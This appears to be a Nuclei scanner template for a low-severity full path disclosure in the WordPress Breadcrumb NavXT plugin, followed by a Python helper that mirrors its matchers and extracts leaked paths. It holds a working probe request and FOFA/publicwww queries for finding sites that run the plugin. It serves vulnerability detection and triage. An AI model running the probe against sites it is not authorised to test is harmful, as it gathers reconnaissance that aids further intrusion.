Vulnerability Description
The Breadcrumb NavXT plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
id: wp-breadcrumb-navxt-fpd

info:
  name: WordPress Breadcrumb NavXT - Full Path Disclosure
  author: theamanrawat
  severity: low
  description: |
    The Breadcrumb NavXT plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
  reference:
    - https://wordpress.org/plugins/breadcrumb-navxt/
  metadata:
    max-request: 1
    verified: false
    publicwww-query: "/wp-content/plugins/breadcrumb-navxt/"
    fofa-query: body="/wp-content/plugins/breadcrumb-navxt/"
  tags: wordpress,wp,wp-plugin,fpd,breadcrumb-navxt

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/breadcrumb-navxt.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "breadcrumb-navxt")'
        condition: and
# digest: 4b0a00483046022100e6314efccab2084ecca8938d6c1b3d1c6ef514d1318d8f57b66a95b90e82551b0221008bb289d4cd3d996e99d0db5a4f39078fc544f1ef6e00c96bd56c5b45d9bdef85:922c64590222798bb761d5b6d8e72950
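For triaging a hit from this template on a site you operate, the following added example (not part of the template or the plugin) re-implements the three DSL matchers offline and extracts the absolute path that the error output leaks. The function names, the sample body, and the called function name in it are constructed for illustration, and the path pattern assumes PHP's default error message format.

```python
import re

# Constructed sample body (not captured from a real site): PHP's default
# html_errors output for an uncaught Error. The function name and line
# number are placeholders.
PLUGIN_FILE = "/var/www/html/wp-content/plugins/breadcrumb-navxt/breadcrumb-navxt.php"
FATAL_SAMPLE = (
    "<br />\n<b>Fatal error</b>:  Uncaught Error: Call to undefined function "
    f"example_wp_function() in {PLUGIN_FILE}:27\nStack trace:\n#0 {{main}}\n"
    f"  thrown in <b>{PLUGIN_FILE}</b> on line <b>27</b><br />\n"
)


def template_matches(status_code: int, body: str) -> bool:
    """Mirror the template's three DSL matchers joined by `condition: and`."""
    error_markers = (
        ("Fatal error" in body and "Uncaught Error:" in body)
        or ("Warning:" in body and "failed to open stream" in body)
    )
    status_ok = status_code in (200, 500)
    return error_markers and status_ok and "breadcrumb-navxt" in body


# PHP error text ends with " in <file> on line <n>" or, for uncaught errors,
# " in <file>:<n>". With html_errors on, file and line are wrapped in <b>.
# Accepts Unix absolute paths and Windows drive-letter paths.
_PATH_RE = re.compile(
    r" in (?:<b>)?((?:/|[A-Za-z]:[\\/])[^\s<>:]+\.php)(?:</b>)?"
    r"(?: on line |:)(?:<b>)?\d+"
)


def disclosed_paths(body: str) -> list[str]:
    """Return the distinct absolute filesystem paths leaked in the body."""
    return sorted(set(_PATH_RE.findall(body)))


if __name__ == "__main__":
    print(template_matches(500, FATAL_SAMPLE), disclosed_paths(FATAL_SAMPLE))
```

A body that satisfies `template_matches` but yields no path from `disclosed_paths` contains the error keywords without an absolute path in the expected format and needs manual review.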